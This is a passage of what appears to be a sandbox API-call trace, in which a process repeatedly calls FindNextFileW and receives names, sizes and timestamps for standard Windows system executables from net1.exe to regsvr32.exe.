dwReserved1=0x0, cFileName="net1.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31390bc8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x31390bc8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x31390bc8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="netbtugc.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x308176d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x308176d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x308176d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe400, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetCfgNotifyObjectHost.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30863b8c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x30863b8c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x30863b8c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="netiougc.exe", cAlternateFileName="")) returned 1 [0107.989] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe67e20, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2fe67e20, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2fe67e20, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Netplwiz.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e69062e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e69062e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e69062e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14600, dwReserved0=0x0, dwReserved1=0x0, cFileName="netsh.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="NETSTAT.EXE", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e7f990, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e7f990, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e7f990, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10200, dwReserved0=0x0, dwReserved1=0x0, cFileName="newdev.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x315a6caf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x315a6caf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x315a6caf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x38c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="notepad.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b72db05, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b72db05, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b72db05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="nslookup.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3149bc35, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3149bc35, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3149bc35, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntprint.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb0d81e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bb0d81e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bb0d81e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="odbcad32.exe", cAlternateFileName="")) returned 1 [0107.990] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d05c81d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d05c81d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d05c81d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="odbcconf.exe", cAlternateFileName="")) returned 1 [0107.991] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3150e345, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3150e345, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3150e345, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7718c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDriveSetup.exe", cAlternateFileName="")) returned 1 [0107.991] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29f09e63, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29f09e63, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29f09e63, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="openfiles.exe", cAlternateFileName="")) returned 1 [0107.991] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x315a6caf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x315a6caf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x315a6caf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OpenWith.exe", cAlternateFileName="")) returned 1 [0107.991] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb7ff26, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bb7ff26, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bb7ff26, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="osk.exe", cAlternateFileName="")) returned 1 [0107.991] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe8e076, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2fe8e076, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2fe8e076, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PasswordOnWakeSettingFlyout.exe", cAlternateFileName="")) returned 1 [0107.993] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PATHPING.EXE", cAlternateFileName="")) returned 1 [0107.993] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28ecbe41, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28ecbe41, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28ecbe41, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="pcaui.exe", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2feb42d5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2feb42d5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="perfhost.exe", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b9c869, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29b9c869, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29b9c869, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="perfmon.exe", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e2b0915, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e2b0915, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e2b0915, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb770, dwReserved0=0x0, dwReserved1=0x0, cFileName="PickerHost.exe", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e69062e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PING.EXE", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33c03ed0, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x33c03ed0, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x33c03ed0, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x30a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkgMgr.exe", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c889dee, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x8c889dee, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x8c889dee, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x1d200, dwReserved0=0x0, dwReserved1=0x0, cFileName="poqexec.exe", cAlternateFileName="")) returned 1 [0107.994] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a58a8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e1a58a8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e1a58a8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="powercfg.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52146d53, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x52146d53, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x52146d53, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationHost.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3241b09a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3241b09a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x324412f4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="prevhost.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f182fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f182fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f182fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="print.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x314c1e90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x314c1e90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x314c1e90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf400, dwReserved0=0x0, dwReserved1=0x0, cFileName="printui.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b9b62fb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b9b62fb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b9b62fb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="proquota.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e0d281, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e0d281, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e0d281, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="psr.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30758b1a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x30758b1a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x30758b1a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasautou.exe", cAlternateFileName="")) returned 1 [0107.995] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30889de6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x30889de6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x30889de6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasdial.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5faaf16e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5faaf16e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5faaf16e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19400, dwReserved0=0x0, dwReserved1=0x0, cFileName="raserver.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30889de6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x30889de6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x30889de6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32526108, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x32526108, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x32526108, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdpSa.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32526108, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x32526108, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x32526108, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdpSaProxy.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32526108, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x32526108, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x32526108, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdpSaUacHelper.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f8aa06, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f8aa06, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f8aa06, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rdrleakdiag.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28fd6ebf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28fd6ebf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28fd6ebf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReAgentc.exe", cAlternateFileName="")) returned 1 [0107.996] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29cf3d8b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29cf3d8b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29cf3d8b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="recover.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x284a9e8e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x284a9e8e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x284a9e8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d8c6ed, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d8c6ed, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d8c6ed, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0x0, dwReserved1=0x0, cFileName="regedit.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d8c6ed, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29d8c6ed, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29d8c6ed, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="regedt32.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334590af, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x334590af, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x334590af, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="regini.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2839ee09, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2839ee09, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2839ee09, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Register-CimProvider.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33432e59, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x33432e59, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x33432e59, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="regsvr32.exe", cAlternateFileName="")) returned 1 [0107.997] FindNextFileW 